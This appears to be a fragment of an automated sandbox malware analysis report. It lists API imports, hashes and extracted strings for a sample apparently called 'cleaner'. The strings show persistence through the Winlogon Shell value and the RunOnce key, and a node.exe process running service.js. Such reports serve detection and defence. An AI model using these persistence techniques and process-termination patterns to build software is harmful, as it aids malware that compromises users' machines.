                                                                                                                                                                                                              • API ID: Close$HandleProcess$Create$free$CurrentFilewcslen$memset$ChangeDuplicateFindNameNotificationProcess32Value_wcsicmp$CommandFirstFullImageLineModuleMoveNextOpenQuerySnapshotTerminateToolhelp32_wsplitpathcallocmemcpywcsstr
                                                                                                                                                                                                              • String ID: InetHelper$SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon$SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce$Shell$St0P$\\?\pipe\$explorer.exe,"$node.exe$node.exe" "$service.js"$service.js.lock$servicelog.prev.txt$servicelog.txt
                                                                                                                                                                                                              • API String ID: 2280789697-528123803
                                                                                                                                                                                                              • Opcode ID: fd6155b351da04958c64a27a99a86dbb72f9f9af5972e398f9666034766e370d
                                                                                                                                                                                                              • Instruction ID: 42149031852a0af697b6002a1aafd73dbfd514e77e8d405753135c3f94f80740
                                                                                                                                                                                                              • Opcode Fuzzy Hash: fd6155b351da04958c64a27a99a86dbb72f9f9af5972e398f9666034766e370d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B8A184B2544388BFE360AB61DC89FAF77ADFB84750F000919F745D60D1EAB49904DB62
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 26 fe1000-fe100f 27 fe102a-fe103c calloc 26->27 28 fe1011-fe1015 26->28 30 fe103e 27->30 31 fe1075-fe107c 27->31 29 fe1017-fe1028 wcslen 28->29 29->27 29->29 32 fe1042-fe1073 wcslen memcpy 30->32 32->31 32->32
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000001D.00000002.2280747843.0000000000FE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000001D.00000002.2280711919.0000000000FE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                              • Associated: 0000001D.00000002.2280779803.0000000000FE2000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_29_2_fe0000_cleaner.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: wcslen$callocmemcpy
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1707914859-0
                                                                                                                                                                                                              • Opcode ID: 309c4790d24ce5a967cb9923a981a91e472d47bea18d2f5f8027de38aec87fb8
                                                                                                                                                                                                              • Instruction ID: 29241b420e96243179a0e7e3d93170ef8e0fa83b524b6d0ca6bb11ec8f30ea88
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 309c4790d24ce5a967cb9923a981a91e472d47bea18d2f5f8027de38aec87fb8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6C01D6766043499FD710DF59EC88856BBE8FF84364B00041DFA45872A2FB31EC08DA91
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%